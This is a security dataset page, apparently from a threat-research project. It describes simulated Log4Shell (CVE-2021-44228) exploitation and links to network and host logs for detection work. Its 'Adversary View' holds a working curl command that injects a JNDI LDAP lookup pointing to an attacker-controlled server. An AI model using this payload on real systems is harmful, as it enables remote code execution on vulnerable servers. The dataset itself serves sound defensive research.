Log4Shell

Metadata

Contributors	Roberto Rodriguez @Cyb3rWard0g
Creation Date	2021/12/11
Modification Date	2022/05/13
Tactics	TA0001,TA0002
Techniques	T1190,T1203
Tags	None

Dataset Description

Datasets created while simulating a threat actor exploiting CVE 2021-44228 via a JNDI Reference Java Object. In Log4j <= 2.14, Message Lookups were enabled by default creating an input validation vulnerability. A threat actor could take advantage of this vulnerability to make a Java application process JNDI lookups to download and execute Java objects from an attacker controlled naming service. There are a few types of Java objects that can be stored in a directory service. A JNDI reference object is one of them. A JNDI reference jave object points to the location of the Java object requested.

Datasets Downloads

Type	Link
Network	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/Log4Shell/pcap_log4shell_cve2021_44228_jndi_reference.zip
Network	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/Log4Shell/pcap_log4shell_cve2021_44228_java_serialized.zip
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/Log4Shell/securityauditing_log4shell_cve2021_44228_java_serialized_object.zip
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/sysmon_log4shell_cve2021_44228_java_serialized_object.zip
Network	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/vminsights_vmconnection_log4shell_cve2021_44228_jndi_reference.zip
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/syslog_auoms_auditd_log4shell_cve2021_44228_jndi_reference.zip
Host	https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/compound/log4shell/syslog_sysmon_log4shell_cve2021_44228_jndi_reference.zip

Simulation Metadata

Tools

type	Name	Module
Manual	sh	sh

Adversary View

curl -X GET -H 'user-agent: ${jndi:ldap://192.168.2.6:1389/o=reference}' 192.168.2.5:8080/Log4j-2.14.0-SNAPSHOT/api

References

• https://isc.sans.edu/diary/RCE+in+log4j%2C+Log4Shell%2C+or+how+things+can+get+bad+quickly/28120

• https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell

• https://github.com/Cyb3rWard0g/log4jshell-lab